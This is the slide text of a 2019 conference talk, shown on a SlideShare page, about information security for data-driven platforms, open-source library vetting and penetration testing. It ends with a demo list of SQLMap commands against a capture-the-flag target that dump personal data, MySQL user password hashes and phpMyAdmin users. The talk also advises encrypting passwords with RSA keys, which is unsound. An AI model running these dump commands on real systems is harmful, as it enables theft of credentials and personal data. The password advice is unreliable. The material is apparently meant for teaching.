SlideShare a Scribd company logo

Demystify Information Security & Threats for Data-Driven Platforms With Chetan Khatri

Chetan Khatri
Chetan Khatri

The document discusses information security for data-driven platforms and open source projects. It motivates the importance of security through examples of data breaches. It covers topics like encryption, authentication, vulnerabilities in open source code, and how to evaluate open source libraries for security issues. The document demonstrates penetration testing tools like Vega and SQLMap to find vulnerabilities like SQL injection in web applications.

Technology
1 of 72
Download to read offline
Demystify Information Security & Threats for Data-Driven Platforms Chetan Khatri Solution Architect - Data & ML. Accionlabs Inc. 18th Oct, 2019
Who Am I? Professional Career: ● 2016 - Present. - Technical Lead / Solution Architect - Data & ML. ● 2015 - 2016 - Principal Big Data Engineer, Lead - Data Science Practice. ● 2014 - 2016 - Developer - Data Platforms. ● 2012 - 2014 - Consultant - Product developments. University: Master of Computer Science. Data Warehousing, Data Mining, Information Security / Cryptography, Reverse Engineering, Information Retrieval.
Agenda ● Motivation ● Information Security - Ethics. ● Encryption ● Authentication ● Information Security & Potential threats with Open Source World. ● Find vulnerabilities. ● Checklist before using any Open Source library. ● Vulnerabilities report. ● Penetration Testing for Data Driven Developments.
Information Security - Motivation Why Information Security is important?
Information Security - Motivation Source: https://www.huffingtonpost.in/2018/07/06/hackers-have-ac cessed-email-ids-phone-numbers-of-over-5-million-yatra-u sers_a_23475885/
Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-b ank-india-data-leak/
Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-b ank-india-data-leak/
Information Security - Motivation Source: https://economictimes.indiatimes.com/smal l-biz/security-tech/security/zomato-hacked- security-breach-results-in-17-million-user-d ata-stolen/articleshow/58729251.cms
Information Security - Motivation Source: https://www.forbes.com/sites/zakdoffman/2 019/07/09/warning-as-millions-of-zoom-us ers-risk-webcam-hijack-change-your-settin gs-now/#281cb40642d9
Information Security - Motivation
Information Security - Motivation
Information Security - Motivation
Source: https://www.zdnet.com/article/another-data-leak-hits-indi a-aadhaar-biometric-database/
Information Security - Ethics. ● Information Storage - What, Which form, Access to whom? ● Information Usage - Where, How, Which form? ● Responsibility - Ownership, usage? ● Confidentiality ● Authentication ● Governance - Regulators, Guidelines, Damage? ● Freedom vs Force ● Damage to the Society. ● Impact on humanity. ● Data Breach and Cost.
Freedom vs Force
Freedom vs Force Source: https://en.wikipedia.org/wiki/Facebook%E2%80%93Cambridge_Analytica_data_scandal
Freedom vs Force Source: https://www.cnbc.com/2018/04/10/facebook-cambridge-anal ytica-a-timeline-of-the-data-hijacking-scandal.html Source: https://www.engadget.com/2019/07/24/facebook-will-pay-5-b illion-fine-for-cambridge-analytica-data-b/
Data Monetization against ethics Source: https://techcrunch.com/2019/03/22/facebook-staff-raised-concerns- about-cambridge-analytica-in-september-2015-per-court-filing/ Source: https://www.theguardian.com/news/2018/mar/17/cambridge-analyti ca-facebook-influence-us-election
Encryption How many people have seen Password in Plain Text at Database? 80%?? 90%?? Yes, Sad but True. Source: https://www.digitaltrends.com/news/equifax-data-breach-class-action-lawsuit-hack -password/
Encryption How many people have seen Password in Plain Text at Database? 80%?? 90%?? Yes, Sad but True. Never ever store password of the application in Plain-text. Encrypt it. Use Asymmetric Key Encryption If RSA, use ssh-keygen -t rsa -b 4096
Authentication Open IP Open Ports Default Username and Password for Database, Services etc. Chmod 777 for all directories, files ! Lol ;p
Information Security & Potential threats with Open Source World.
Information Security & Potential threats with Open Source World. How many of you use Open Source ?
Security for Open Source world How well do you know what is inside your project?
Security for Open Source world Known Good Development practices. Community Supported Open Source Code. v/s Random Code found on the Internet.
Vulnerability in Open Source Source: https://synopsys.com/content/dam/synopsys/sig-assets/repo rts/2018-ossra.pdf
How Do I Choose GOOD Open Source
How do I choose SECURE open source packages?
How do I choose SECURE open source packages? Have a look First look
Key questions for a first look? ● Read the README.md or any other readily accessible introductory information? ● Does code seem to be held with good software development standards? ● Does this code develop for professional purposes or hobby projects? ● Any signs for known issues in the code? ● Does this code only solve one use case or is it robust enough for other use cases? ● Is this code active or an archive, “abandoned”? Look for warning signs...
Warning Signs
Even an author says - to use something else! Source: https://code.google.com/archive/p/c rypto-js/
Build by an unauthorized person Source: https://metacpan.org/release/Tivoli- AccessManager-Admin
I did not write this code, but I like it. Source: https://github.com/kbranigan/cJSON
Not maintained anymore … Archived! Source: https://code.google.com/archive/p/crypto-js/
Dumbest library - An author! Source: https://github.com/kbranigan/cJSON/commit/730 209a718cc9bada631cea136d13017752720f5
It is slower and more subjective to side-channel attacks by nature. Source: http://www.literatecode.com/aes256
What to watch before using any package/library?
Key Questions for each Open Source Library Do only 1-2 Collaborators exist? Chances are more to have unreviewed, harmful code. Code merged to master branch is been reviewed with PR? How many issues are OPEN? Validate that OPEN issues are being addressed? Is that code maintained or abandon? Are issues getting fixed and released promptly?
Key Questions for each Open Source Library Check recently active committers and commit? To understand how old is the project. Check how they handle vulnerabilities and security. How you can report security vulnerabilities? Check open security bugs/issues? Good example: Apache Community. https://www.apache.org/security/
Reporting A Vulnerability
Vulnerability Handling
No known vulnerabilities doesn’t mean SECURITY! 1101 new vulnerabilities reported only in Oct, 2019. Source: https://nvd.nist.gov/vuln/full-l isting/2019/10
Vulnerabilities report we are going far worse! Source: https://www.cvedetails.com/brows e-by-date.php
Penetration Testing {Network, Database}
Check number of OPEN services and ports sudo nmap -p- -sS -A IP-Address
Server Files / Directories Scan on permission and Access java -jar DirBuster-0.12.jar -H -u http://167.71.224.201:1337 httrack website copier
Subgraph Vega ● Vega is a free and open source web security scanner and web security testing platform to test the security of web applications. ● SQL Injection ● XSS ● Inadvertently disclosed sensitive information ● Reflected cross-site scripting ● Stored cross-site scripting ● Blind SQL injection ● Remote file include ● Shell injection ● TLS / SSL security settings
Setup Proxy for Vega Tool
Setup Proxy for Vega Tool
Vega - Start the proxy!
Vega - Start scanning Web application
Vega - Start scanning Web application
Security Scanning alert summary
Security Scanning alert summary
Web Application - Tracing web request payload at Proxy
Web Application - Tracing web request payload at Proxy
Web Application - Intercepting the response callback at Proxy
SqlMap - A penetration testing tool for exploiting SQL injection flaws and a lot! ● Database fingerprinting. ● Full Support for SQL Injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band. ● Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack. ● dump database tables entirely. ● Out of Box Search support for Database names, Table names, Column names and values. ● Support to execute arbitrary commands and retrieve their standard output. ● Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server.
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
SQLMap - Commands python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables user_profile python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile -C Email, Mobile, Name --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T ctf --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T users --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns --dump https://gist.github.com/chetkhatri/45b76d3f2d1da1d798d86a 8709f33ac5
Questions?
Hope you had a fun!
Thank you! Chetan Khatri, chetan.khatri@live.com @khatri_chetan - https://twitter.com/khatri_chetan https://github.com/chetkhatri

Recommended

Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Chetan Khatri
 
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...
Agile Testing Alliance
 
What you need to know about OSINT
What you need to know about OSINTWhat you need to know about OSINT
What you need to know about OSINT
Jerod Brennen
 
National seminar on emergence of internet of things (io t) trends and challe...
National seminar on emergence of internet of things (io t) trends and challe...National seminar on emergence of internet of things (io t) trends and challe...
National seminar on emergence of internet of things (io t) trends and challe...
Ajay Ohri
 
OSINT using Twitter & Python
OSINT using Twitter & PythonOSINT using Twitter & Python
OSINT using Twitter & Python37point2
 
Kush stats alpha
Kush stats alpha Kush stats alpha
Kush stats alpha
Ajay Ohri
 
AI for security or security for AI - Sergey Gordeychik
AI for security or security for AI - Sergey GordeychikAI for security or security for AI - Sergey Gordeychik
AI for security or security for AI - Sergey Gordeychik
Sergey Gordeychik
 
AI and Security
AI and SecurityAI and Security
AI and Security
Anurag Sahay
 

Recommended

Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Chetan Khatri
 
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...
Agile Testing Alliance
 
What you need to know about OSINT
What you need to know about OSINTWhat you need to know about OSINT
What you need to know about OSINT
Jerod Brennen
 
National seminar on emergence of internet of things (io t) trends and challe...
National seminar on emergence of internet of things (io t) trends and challe...National seminar on emergence of internet of things (io t) trends and challe...
National seminar on emergence of internet of things (io t) trends and challe...
Ajay Ohri
 
OSINT using Twitter & Python
OSINT using Twitter & PythonOSINT using Twitter & Python
OSINT using Twitter & Python37point2
 
Kush stats alpha
Kush stats alpha Kush stats alpha
Kush stats alpha
Ajay Ohri
 
AI for security or security for AI - Sergey Gordeychik
AI for security or security for AI - Sergey GordeychikAI for security or security for AI - Sergey Gordeychik
AI for security or security for AI - Sergey Gordeychik
Sergey Gordeychik
 
AI and Security
AI and SecurityAI and Security
AI and Security
Anurag Sahay
 
AI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtAI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for Thought
NUS-ISS
 
The good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurityThe good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurity
Mohammad Khreesha
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet version
Chandrapal Badshah
 
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
Anton Goncharov
 
The Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security AnalysisThe Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security Analysis
Anton Goncharov
 
Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!
VINCIT SPRL - STRATEGY
 
Is AI going to provide safety for us?
Is AI going to provide safety for us?Is AI going to provide safety for us?
Is AI going to provide safety for us?
DLabs
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
CODE BLUE
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINT
Chandrapal Badshah
 
AI and ML in Cybersecurity
AI and ML in CybersecurityAI and ML in Cybersecurity
AI and ML in Cybersecurity
Forcepoint LLC
 
Grounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge BaseGrounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge Base
Vaticle
 
Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017
reconvillage
 
OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!
Nutan Kumar Panda
 
OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019
RedHunt Labs
 
How Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help businessHow Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help business
Ajay Ohri
 
OSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligenceOSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligence
Deep Shankar Yadav
 
AI and the Impact on Cybersecurity
AI and the Impact on CybersecurityAI and the Impact on Cybersecurity
AI and the Impact on Cybersecurity
Graham Mann
 
Testing Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche ExposedTesting Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche Exposed
TechWell
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
SSIMeetup
 
Getting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and GraqlGetting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and Graql
Vaticle
 
2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards
APIsecure_ Official
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
MarceloCunha571649
 

More Related Content

What's hot

AI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtAI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for Thought
NUS-ISS
 
The good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurityThe good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurity
Mohammad Khreesha
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet version
Chandrapal Badshah
 
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
Anton Goncharov
 
The Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security AnalysisThe Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security Analysis
Anton Goncharov
 
Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!
VINCIT SPRL - STRATEGY
 
Is AI going to provide safety for us?
Is AI going to provide safety for us?Is AI going to provide safety for us?
Is AI going to provide safety for us?
DLabs
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
CODE BLUE
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINT
Chandrapal Badshah
 
AI and ML in Cybersecurity
AI and ML in CybersecurityAI and ML in Cybersecurity
AI and ML in Cybersecurity
Forcepoint LLC
 
Grounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge BaseGrounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge Base
Vaticle
 
Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017
reconvillage
 
OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!
Nutan Kumar Panda
 
OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019
RedHunt Labs
 
How Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help businessHow Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help business
Ajay Ohri
 
OSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligenceOSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligence
Deep Shankar Yadav
 
AI and the Impact on Cybersecurity
AI and the Impact on CybersecurityAI and the Impact on Cybersecurity
AI and the Impact on Cybersecurity
Graham Mann
 
Testing Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche ExposedTesting Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche Exposed
TechWell
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
SSIMeetup
 
Getting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and GraqlGetting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and Graql
Vaticle
 

What's hot (20)

AI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtAI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for Thought
 
The good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurityThe good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurity
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet version
 
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
 
The Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security AnalysisThe Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security Analysis
 
Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!
 
Is AI going to provide safety for us?
Is AI going to provide safety for us?Is AI going to provide safety for us?
Is AI going to provide safety for us?
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINT
 
AI and ML in Cybersecurity
AI and ML in CybersecurityAI and ML in Cybersecurity
AI and ML in Cybersecurity
 
Grounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge BaseGrounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge Base
 
Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017
 
OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!
 
OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019
 
How Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help businessHow Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help business
 
OSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligenceOSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligence
 
AI and the Impact on Cybersecurity
AI and the Impact on CybersecurityAI and the Impact on Cybersecurity
AI and the Impact on Cybersecurity
 
Testing Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche ExposedTesting Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche Exposed
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
 
Getting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and GraqlGetting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and Graql
 

Similar to Demystify Information Security & Threats for Data-Driven Platforms With Chetan Khatri

2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards
APIsecure_ Official
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
MarceloCunha571649
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
Ernest Staats
 
Web Security... Level Up
Web Security... Level UpWeb Security... Level Up
Web Security... Level Up
Izzet Mustafaiev
 
Penetration testing dont just leave it to chance
Penetration testing dont just leave it to chancePenetration testing dont just leave it to chance
Penetration testing dont just leave it to chance
Dr. Anish Cheriyan (PhD)
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
Graham Charters
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Amine SAIGHI
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal Tricks
ThreatReel Podcast
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101
Narudom Roongsiriwong, CISSP
 
OSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersOSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and Practitioners
Megan DeBlois
 
Dev{sec}ops
Dev{sec}opsDev{sec}ops
Dev{sec}ops
Steven Carlson
 
Web Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging ThreatsWeb Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging Threats
Alan Kan
 
Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0
Neelu Tripathy
 
Software Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and SecuritySoftware Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and Security
Tao Xie
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
Asep Sopyan
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedfangjiafu
 
PROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITYPROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITY
Sylvain Martinez
 
Security guidelines
Security guidelinesSecurity guidelines
Security guidelines
karthz
 
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Keith Kraus
 

Similar to Demystify Information Security & Threats for Data-Driven Platforms With Chetan Khatri (20)

2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
Web Security... Level Up
Web Security... Level UpWeb Security... Level Up
Web Security... Level Up
 
Penetration testing dont just leave it to chance
Penetration testing dont just leave it to chancePenetration testing dont just leave it to chance
Penetration testing dont just leave it to chance
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal Tricks
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101
 
OSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersOSINT Basics for Threat Hunters and Practitioners
